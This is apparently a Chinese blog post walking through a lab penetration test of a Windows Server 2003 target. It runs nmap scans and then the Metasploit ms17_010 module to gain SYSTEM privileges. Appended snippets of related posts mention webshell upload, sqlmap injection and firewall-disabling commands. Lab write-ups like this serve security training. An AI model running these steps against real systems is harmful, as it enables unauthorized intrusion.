主机 渗透

已于 2024-03-14 20:13:20 修改
阅读量454 收藏 12
点赞数 9
分类专栏: kali 文章标签: 安全 web安全 网络
于 2024-03-14 20:01:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lin__ying/article/details/136690005
版权

1:kali

靶机:Windows Server 2003

端口扫描

1.用nmap端口扫描靶机

nmap -sP 192.168.157.0/24   #扫描192.168.157.0这个网段存活的主机

靶机的IP为192.168.157.130

2

nmap -sV192.168.157.130 -p-   #-sV 参数用于启用版本检测,192.168.157.130 是目标主机的IP地址,-p- 参数用于扫描所有端口

msfconsole

1. ms17_101  

search ms17_010  #询问有关"ms17_010"的漏洞信息

2.use

use 1 #利用1这个模块

3.options

show options   #列出模块所需的各种参数

4.set

set rhosts 192.168.157.130         # 设置远程目标主机的IP地址为192.168.157.130

5.exploit

exploit   #执行攻击

6.获得system32,Windows最高权限

lin___ying
关注
专栏目录
DC-5主机渗透
weixin_65920814的博客
05-25 245
本文详细介绍DC-5主机渗透测试的全部内容
Co.MZ的一次主机渗透
u013622866的博客
05-16 1302
前言 今天拿到一个比较简单的靶机进行渗透实验,一共放置了4个flag,通过尝试,可算是搞出来了,哈哈~ 目标发现 通过nmap进行扫描,发现目标主机 尝试访问 信息收集 端口开放情况 后台发现 http://192.168.188.150/admin.php?s=/login/index web渗透 SQL注入 查找注入点 发现新闻界面存在传参,可能存在注入,...
dc-9主机渗透
w1157673482的博客
02-28 4291
DC-9主机渗透测试
DC-3主机渗透
weixin_65920814的博客
05-18 389
本文章主要详细讲解DC-3主机渗透全过程
主机渗透——TOMCAT_UPLOAD
B_roin的博客
02-14 2264
1. 使用nmap进行端口扫描,发现8080端口开放 2. 结合目标网站版本,进行信息收集 3. 发现存在命令执行漏洞 利用burp suite上传 jsp 木马 4. 在web页面进行访问查看 http://ip地址/tt.jsp?pwd=023&i= 命令 5. 结合冰蝎,获取webshell 注意:冰蝎需要使用自己的shell 利用burpsuite PUT方式上传后,连接冰蝎 ...
DAY27:主机渗透测试
qq_49433473的博客
08-10 2782
主机渗透测试、主机渗透常用端口、服务默认端口及爆破使用、主机渗透漏洞实例利用 向日葵rce示例,redis弱口令爆破及getshell
[渗透测试篇]主机操作系统渗透之浅谈Linux提权
qq_43668710的博客
04-18 1117
前言 为何而写 其实这篇博客的出现是因为上一篇关于Vulnhub靶机系列的DC-1才决定来写的,因为在那篇文章中针对靶机的姿势涉及到了我的知识盲区----提权.于是,不允许放任自己"无知"的我,决定了这篇文章的诞生,以记录我对linux提权的学习和认知! 提权圣经 附:文章开始正文开始之前先给大家安利一篇出自大神g0tmi1k之手的Linux提权圣经Basic Linux Privilege Es...
渗透主机操作
内心不种满鲜花就会长满杂草
04-29 873
防火墙操作 #查看防火墙开启关闭状态。win2003默认不开启防火墙,如果现实该命令未发现,则没有开启防火墙 netsh advfirewall show allprofiles #关闭防火墙(需管理员权限) Server2003及之前版本:netsh firewall set opmode disable Server2003之后版本: netsh advfirewall set allprofiles state off (off换成on就是开启) #修改防火墙配置 Server20
蓝盾实训营day5——windows主机渗透、kali-metasploit、melody木马
mingC0758的博客
07-13 917
目录: 目标扫描 漏洞扫描 漏洞利用 提权 留后门 环境: windows xp sp2 (ms08_067漏洞利用) kali linux 2.0(配置好Nessus环境)
渗透测试笔记------主机探测
00后学编程
08-22 696
主机探测 二层探测 1.OSI分层介绍,即开放式系统互联 主要通过用OSI中的链路层的针头进行探测,主要用到ARP探测 2。二层主机发现优缺点 二层主机发现指,利用iso中链路层中的协议进行主机发现,一般使用ARP协议 优点: (局域网中痛心啊使用ARP协议,利用MAC地址作为对应的识别地址) 速度快 可靠性高 缺点 : 无法扫描经过路由的主机 二层工具命令 arping命令 -A:与-U参数类似,但是使用的是ARP REPLY包而非ARP REQUEST包。 -b:发送以太网广播帧,arping在
内网安全---边界主机渗透
gental_z的博客
01-22 1245
一、简单环境搭建 一台VPS,一台边界服务器OWASP,一台内部服务器Ubuntu Server 网络拓扑如图所示: 关于环境的部署,在OWSAP服务器中设置两张网卡,一张设置外部IP,另外一张设置内部IP。 # 具体配置在/etc/network/interface # 这里设置静态IP auto eth0 iface eth0 inet static address 192.168.101.100 netmask 255.255.255.0 gateway 192.168.101.2 auto et
内网安全---一层主机渗透
gental_z的博客
01-30 848
内网学习小结 一、环境搭建 实验拓扑结构: 在一层内网服务器ubuntu上搭建redis服务器,接下来的实验通过redis未授权漏洞来获取目标主机的权限。 在OWASP服务器上做NAT转换,使Ubuntu Server可以连接外网: # 配置ipables做nat iptables -t nat -A POSTROUTING -s 192.168.100.0/24 -o eth0 -j SNAT --to 192.168.101.100 # 打开Linux内核转发功能 echo "1" > /pr
渗透-主机发现】从0到1,结合工具,入门渗透中的主机发现技术
极客-多重人格递归
05-11 720
要实现一次成功的渗透操作,先要有一些预动作,例如:主机发现、信息收集、漏洞扫描等。主机发现的根本目的就是找到你要进行渗透操作的目标,其中,可以有很多思想方法可以借鉴,有很多工具可以利用。
新手如何入门黑客技术,黑客技术入门该学什么?
Karka_的博客
10-11 151
你是否曾经也对黑客技术感兴趣呢?感觉成为黑客是一件很酷的事,那么作为新手如何入门黑客技术,黑客技术入门该学什么呢?其实不管你想在哪个新的领域里有所收获,你需要考虑以下几个问题首先你要想明白为什么学这个,不管是爱好也好,想要把他作为职业也好,只有清楚了自己的目的后才可以持之以恒的去学习,因为计算机领域要学的知识是非常多的,没有长久的坚持是没办法学会的。
工具组合,实现主机渗透
weixin_44232687的博客
10-30 188
深夜的我,乏困中有一丝希望,这是我的未来,且走且珍惜。 ——杰 这里的192.168.20.71,现在已经无效。 假设,觉得一个网站存在数据库注入漏洞,则渗透如下,比有结果。 python sqlmap.py -u http://192.168.20.71/news.php?newsid=24 Sql注入查看都有那些数据库。 有东西,则: python Sqlmap.py -u http://192.168.20.71/news.php?newsid=24 -D 510cms --tables 查询510
一次完整的渗透流程
m0_69408815的博客
05-29 1178
一次完整的渗透 攻击机:linux2021 靶机:windows server 2008 R2 文章目录一次完整的渗透攻击机:linux2021 靶机:windows server 2008 R2一、主机发现模块二、 靶机信息收集使用nmap -sV 192.168.93.129三、漏洞利用 ms17-0101.启动msfconsole2.搜索ms17-010漏洞3.利用漏洞4.运行漏洞 一、主机发现模块 nmap,fping,netdiscover都是很好用的扫描存货靶机的工具 nmap扫描存活靶机用
红队靶场内网渗透(从DMZ主机渗透到域内机器)
m0_65712192的博客
02-12 4334
红队靶场内网渗透(从DMZ主机渗透到域内机器)
Linux 主机超全渗透测试命令汇总
02-12
Linux 主机超全渗透测试命令汇总Linux 主机超全渗透测试命令汇总Linux 主机超全渗透测试命令汇总
内网渗透-Linux内网渗透
最新发布
lza20001103的博客
04-14 2121
内网渗透-Linux内网渗透
内网渗透主机发现的技巧
hl1293348082的专栏
04-08 442
在内网渗透中,为了扩大战果,往往需要寻找更多主机并且对这些主机进行安全检测或帐号密码测试,所以主机发现这个步骤必不可少。我们如何在不实用扫描器的情况下发现更多主机呢? 确定IP段 通常内网地址分三段:10.0.0.0/8、172.16.0.0/12以及192.168.0.0/16。在没有做任何操作之前,我们可以大概知道内网的IP地址段,不过也有些公司,在内网又会有公网IP的情况,也就是说在内网中可以访问到的IP段有很多。 下面就主要介绍一下收集IP段的方式。 查看本机的IP地址 Window.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

lin___ying

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值